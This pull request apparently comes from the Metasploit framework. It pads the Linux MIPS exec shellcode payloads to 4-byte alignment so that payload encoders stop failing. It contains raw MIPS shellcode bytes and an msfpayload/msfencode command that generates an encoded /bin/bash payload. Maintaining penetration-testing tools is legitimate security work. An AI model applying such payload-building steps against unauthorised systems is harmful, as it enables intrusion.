### PR TITLE
MIPS exec payload fixes for encoder

### DIFF
--- a/modules/payloads/singles/linux/mipsbe/exec.rb
+++ b/modules/payloads/singles/linux/mipsbe/exec.rb
@@ -66,7 +66,13 @@ module Metasploit3
     #
     # Constructs the payload
     #
-    return super + shellcode + command_string + "\x00"
+
+    shellcode = shellcode + command_string + "\x00"
+
+    # we need to align our shellcode to 4 bytes
+    (shellcode = shellcode + "\x00") while shellcode.length%4 != 0
+
+    return super + shellcode
 
   end
 

--- a/modules/payloads/singles/linux/mipsle/exec.rb
+++ b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -62,12 +62,18 @@ module Metasploit3
       "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
       "\xe8\xff\xa5\x27" + # addiu a1,sp,-24
       "\xab\x0f\x02\x24" + # li v0,4011
-      "\x0c\x01\x01\x01"   # + syscall 0x40404
+      "\x0c\x01\x01\x01"   # syscall 0x40404
 
     #
     # Constructs the payload
     #
-    return super + shellcode + command_string + "\x00"
+
+    shellcode = shellcode + command_string + "\x00"
+
+    # we need to align our shellcode to 4 bytes
+    (shellcode = shellcode + "\x00") while shellcode.length%4 != 0
+
+    return super + shellcode
 
   end
 


### PR DESCRIPTION
A little fix for our MIPS exec shellcodes to fulfill the 4 byte alignment. Till now we had the following exception as soon as we try to use an encoder:

```
#./msfpayload linux/mipsbe/exec CMD=/bin/bash R | ./msfencode -e mipsbe/longxor -t c
[-] mipsbe/longxor failed: uninitialized constant       Msf::Modules::Mod656e636f6465722f6d69707362652f6c6f6e67786f72::Metasploit3::InvalidPayloadSizeException
[-] No encoders succeeded.
```

Now something like this will work ;)

Best,
Mike
